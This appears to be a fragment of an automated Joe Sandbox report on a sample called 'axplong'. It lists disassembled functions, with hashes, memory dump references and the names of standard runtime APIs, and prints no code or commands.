                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                                        • Instruction ID: 8adb704d06a20227484a0a755470295a3b473a6cf211df661a285394344b343c
                                        • Opcode Fuzzy Hash: 1f223567361fb13af9adf83f77c6728c27b5a0d60ed15233fd28614e74e3a708
                                        • Instruction Fuzzy Hash: 2B117723F30C255A775C816D8C1727AA5D6DBD825071F533AD826E7284E994DE23D290
                                        Function 00448720 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: 58cfbb8d41375cad285e1c6da808350295a6b31344476fb849924744dafde05b
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: CE11087B20014147F604862DCDF46BFB796EAC5325B3C437FD1414B758DE2AA945D908
                                        Function 0043645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 760ae38ac6910a75ea3fa425d462fe70d88435284ea8fb526c81d7c8047a0e8c
                                        • Instruction ID: 9b65c7c9ebc653f73c8fe90dcd68fd9ec49f231335bab6ae1ce3c91c085a4dab
                                        • Opcode Fuzzy Hash: 760ae38ac6910a75ea3fa425d462fe70d88435284ea8fb526c81d7c8047a0e8c
                                        • Instruction Fuzzy Hash: 74E08C30440648BFDE2A7B25D9499593B5AEF26348F01A805FC1886231CBAAFC91CA88
                                        Function 0043A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                        • Instruction ID: d5b12ebd6edf886f4495bd99fbd257c2c9a1e31a863b1e18c0003e09dd8ddbfb
                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                        • Instruction Fuzzy Hash: 71E04632951228EBCB25DB898904E8AF2ACEB48B44F15409BB501D3240C674DF00C7D4
                                        Function 00417870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0041795C
                                        • __Cnd_destroy_in_situ.LIBCPMT ref: 00417968
                                        • __Mtx_destroy_in_situ.LIBCPMT ref: 00417971
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                        • String ID: 'kAd+F$@yA$d+F
                                        • API String ID: 4078500453-941499601
                                        • Opcode ID: 9e9bc346933c8e8847e7fdd1bf328f586cc5a8bd82eecadce4ea095dfa148acf
                                        • Instruction ID: 306fe0eea3f67382258af3fc1d0e87d4e1c23e42ddf082fa83b7bc71e39c2db3
                                        • Opcode Fuzzy Hash: 9e9bc346933c8e8847e7fdd1bf328f586cc5a8bd82eecadce4ea095dfa148acf
                                        • Instruction Fuzzy Hash: 0631D5B19147049BE720DF69D845A97B7F8EF18314F00062FE945C7242E779EA8887A9
                                        Function 004370C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcsrchr
                                        • String ID: .bat$.cmd$.com$.exe
                                        • API String ID: 1752292252-4019086052
                                        • Opcode ID: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                                        • Instruction ID: 3f9e57f235a537d8eb8cd6a3688bad566dd464967c1f6f53d06d5f0f0e70acd6
                                        • Opcode Fuzzy Hash: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                                        • Instruction Fuzzy Hash: 9B01DBB7608616666A2864199C0373B17989F8BBB9F25102FFE84F73C2DE8DDC02459C
                                        Function 00402E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Mtx_unlock$Cnd_broadcast
                                        • String ID:
                                        • API String ID: 32384418-0
                                        • Opcode ID: 549a4120e473c01e737fc2ff19ca4dbab941edc78c01f4c79017b19d3615c414
                                        • Instruction ID: c6b99eb4f312bd14da5918741c5b6ea93bda90abce3632f83f5614099349358f
                                        • Opcode Fuzzy Hash: 549a4120e473c01e737fc2ff19ca4dbab941edc78c01f4c79017b19d3615c414
                                        • Instruction Fuzzy Hash: A1A1DFB1941206AFDB11DF65C9457ABBBA8AF05319F00413EE815E7381EB38EA44CB99
                                        Function 00402670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00402806
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 004028A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy___std_exception_destroy
                                        • String ID: P#@$P#@
                                        • API String ID: 2970364248-3974838576
                                        • Opcode ID: e35e6aeac92239f282d009e65dfccbf2cff649b47829befc4f3ff50070572f90
                                        • Instruction ID: 0c763ef230728e70a8537f3ccbfc0b031f153f472b9f47e90a79a27d972d902c
                                        • Opcode Fuzzy Hash: e35e6aeac92239f282d009e65dfccbf2cff649b47829befc4f3ff50070572f90
                                        • Instruction Fuzzy Hash: 8E719471D002089BDB04DF98C985BDDFBB5EF59314F14822EE805B7385E778A984CBA9
                                        Function 00402AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: P#@$P#@$This function cannot be called on a default constructed task
                                        • API String ID: 2659868963-4211761357
                                        • Opcode ID: eb3ecc81248d021a59e2495ef6ef31f31518cd35b49ec59c95d56401cab6c6f0
                                        • Instruction ID: 9c613ddfb020e27d5d18226a6da53c9ba12c3d1a084fd06ddee43e789d326886
                                        • Opcode Fuzzy Hash: eb3ecc81248d021a59e2495ef6ef31f31518cd35b49ec59c95d56401cab6c6f0
                                        • Instruction Fuzzy Hash: 41F0F670A1030CABC710DFA998419DEB7ED9F04305F1081AFFC04A7241EBB4AA88CB9D
                                        Function 00402440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_copy
                                        • String ID: 'kAd+F$P#@$P#@
                                        • API String ID: 2659868963-3446528079
                                        • Opcode ID: 3b4e405c4c73811be42fb548f0c6fc714ca8f8f1bed20a3359052d6a60a681cc
                                        • Instruction ID: edb3e56f53f69ce661e35466e60eb17e101642d00dbfc6d8c8f17c16217c36d5
                                        • Opcode Fuzzy Hash: 3b4e405c4c73811be42fb548f0c6fc714ca8f8f1bed20a3359052d6a60a681cc
                                        • Instruction Fuzzy Hash: 38F0A0B591020C67C714EEE5D80198AB3ACDA15315B108A2BFA44A7541F7B4FA48879A
                                        Function 0043C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _strrchr
                                        • String ID:
                                        • API String ID: 3213747228-0
                                        • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                        • Instruction ID: 80392d38669299bfd156cc743137b1e55d3eb7f87ffdfa8cf3f659ae93825dbe
                                        • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                        • Instruction Fuzzy Hash: E3B136329002859FEB11DF29C8C17AEBBE5EF59300F14A1ABD855BB341D63C9D42CB68
                                        Function 0041BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                        • String ID:
                                        • API String ID: 531285432-0
                                        • Opcode ID: b47c8ba6fe03d4e095c6b2ded81985e9e06279d2aebcc52fa30b3ac8f806d208
                                        • Instruction ID: 0436f2bf1fd4ae6352d53801718c112a35185accf0b19711cbd4b6e7ceb45150
                                        • Opcode Fuzzy Hash: b47c8ba6fe03d4e095c6b2ded81985e9e06279d2aebcc52fa30b3ac8f806d208
                                        • Instruction Fuzzy Hash: AB216575A40219AFDF10EFA5CC819FEBB79EF08714F00406AF501B7251DB74AD418BA5
                                        Function 00417040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Mtx_init_in_situ.LIBCPMT ref: 0041726C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Mtx_init_in_situ
                                        • String ID: @.@$`zA
                                        • API String ID: 3366076730-264144187
                                        • Opcode ID: 85c69a542711adcbdc723e53ec2e352efba648933d4f98de690f5e4d1d54eb20
                                        • Instruction ID: f262903753b1b92517ad6e1593d74fc3307ac53456c80996635a8a266d537bb5
                                        • Opcode Fuzzy Hash: 85c69a542711adcbdc723e53ec2e352efba648933d4f98de690f5e4d1d54eb20
                                        • Instruction Fuzzy Hash: 30A137B4E016198FDB21CFA8C98479EBBF1AF48704F14819AE819AB351E7799D41CB84
                                        Function 0043F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
